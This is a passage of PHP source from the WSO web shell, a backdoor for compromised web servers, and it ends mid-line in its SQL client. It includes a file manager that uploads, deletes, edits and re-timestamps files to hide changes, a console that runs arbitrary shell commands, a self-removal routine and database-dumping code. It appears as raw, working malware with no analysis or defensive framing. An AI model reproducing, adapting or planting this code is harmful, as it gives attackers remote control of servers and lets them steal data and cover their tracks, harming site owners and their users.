actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n \r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\r\n\t\t\t\t\techo "Can\'t upload file!";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($item = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$item = $path.$item;\r\n\t\t\t\t\t\tif ( (basename($item) == "..") || (basename($item) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($item);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($item);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($item);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tWSOsetcookie(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tWSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tWSOsetcookie(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n wsoHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\t$dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';wsoFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction wsoCmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "wsoCmp");\r\n\tusort($dirs, "wsoCmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n if(class_exists(\'ZipArchive\'))\r\n echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";\r\n echo "<option value=\'tar\'>Compress (tar.gz)</option>";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n echo "<option value=\'paste\'>Paste / Compress</option>";\r\n echo "</select> ";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo "file name: <input type=text name=p2 value=\'wso_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\r\n echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\twsoHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\twsoFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Change time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$code = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\twsoHeader();\r\n echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;">\';\r\n\techo \'<input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie(\'bye!\');\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n wsoHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction DbClass($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, $pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from 